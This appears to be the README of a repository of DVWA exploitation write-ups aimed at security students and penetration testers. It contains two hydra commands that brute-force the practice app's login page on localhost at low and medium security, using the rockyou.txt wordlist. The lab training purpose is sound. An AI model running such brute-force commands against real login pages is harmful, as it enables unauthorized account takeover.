A comprehensive collection of detailed writeups demonstrating exploitation techniques on Damn Vulnerable Web Application (DVWA) vulnerabilities.
This repository contains writeups for Damn Vulnerable Web Application (DVWA).
This repository serves as an educational resource for security enthusiasts, penetration testers, and students to understand and practice exploiting common web vulnerabilities found in DVWA. It provides step-by-step exploitation examples and techniques to enhance web security knowledge and training.
This repository is intended for educational and training purposes only. Users should have DVWA set up locally or on a controlled environment to safely practice these techniques. The examples rely on hydra and require appropriate permissions to run brute force attacks.
hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 http-get-form "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=low; PHPSESSID=rt5o26sooph0v8p5nuarofj346"
Performs a brute force attack on DVWA's low security login page using hydra with the rockyou.txt password list.
hydra -l admin -P /usr/share/wordlists/rockyou.txt 'http-get-form://127.0.0.1/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=Welcome:H=Cookie\: PHPSESSID=j422143437vlsdgqs0t1385420; security=medium'
Executes a brute force attack on DVWA's medium security login page, demonstrating increased response delay on failed attempts.